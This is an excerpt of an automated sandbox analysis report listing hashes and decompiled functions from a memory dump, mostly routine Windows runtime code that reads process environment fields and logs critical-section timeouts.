                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                            • Instruction ID: 54c643b4374251a3ec9f2a592736d5fda93cc4972282e39954319a49e3f4dd85
                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                            • Instruction Fuzzy Hash: AFC02B78150440BFEB159F30CD00F147254F700A21F6C03547320495F0D5299C00D108
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037CAD30(intOrPtr _a4) {
                            
                            				return L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                            			}



                            0x037cad49

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                            • Instruction ID: dc7c2aea1ee9624ed2ea5108203488b6c39134bb283b3e86d48c4ac7b31f9d97
                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                            • Instruction Fuzzy Hash: D5C08C32080288BBC716AA45DD00F017B29E794B60F000020B6040A6618932E860E588
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037E7D50() {
                            				intOrPtr* _t3;
                            
                            				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                            				if(_t3 != 0) {
                            					return  *_t3;
                            				} else {
                            					return _t3;
                            				}
                            			}




                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                            • Instruction ID: 5b11d069811217bb9b33570c98f6ada1052882333b0f8fdc809bee6494f18bf4
                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                            • Instruction Fuzzy Hash: 46B09234301981CFCE1ADF18C080B1533E8BB48A40B8800D0E400CBA20D229E8008900
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037F2ACB() {
                            				void* _t5;
                            
                            				return E037DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            			}




                            0x037f2adc

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                            • Instruction ID: 7b4f12bff7095082f8188f10d58c41c452e7333e64bb63b2df8a78e763113a09
                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                            • Instruction Fuzzy Hash: 29B092328116408BCF02EB44C610A197331AB00650F0544A090412B9208228AC01CA40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E0385FDDA(intOrPtr* __edx, intOrPtr _a4) {
                            				void* _t7;
                            				intOrPtr _t9;
                            				intOrPtr _t10;
                            				intOrPtr* _t12;
                            				intOrPtr* _t13;
                            				intOrPtr _t14;
                            				intOrPtr* _t15;
                            
                            				_t13 = __edx;
                            				_push(_a4);
                            				_t14 =  *[fs:0x18];
                            				_t15 = _t12;
                            				_t7 = E0380CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                            				_push(_t13);
                            				E03855720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                            				_t9 =  *_t15;
                            				if(_t9 == 0xffffffff) {
                            					_t10 = 0;
                            				} else {
                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                            				}
                            				_push(_t10);
                            				_push(_t15);
                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                            				return E03855720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                            			}











                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0385FDFA
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0385FE01
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0385FE2B
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                            • API String ID: 885266447-3903918235
                            • Opcode ID: ba1ae0b02342f0df0d28043cac42a7e8bdc86033231451e2dc577db8896b4d06
                            • Instruction ID: 17c279f1054b2122049793526047d25980216d83d7ace9f6e2d591b164c1380b
                            • Opcode Fuzzy Hash: ba1ae0b02342f0df0d28043cac42a7e8bdc86033231451e2dc577db8896b4d06
                            • Instruction Fuzzy Hash: E2F0FC76140201BFDE205A85DC01F63BF6ADB45730F140354FA249A1D1DA62F86086F1
                            Uniqueness

                            Uniqueness Score: -1.00%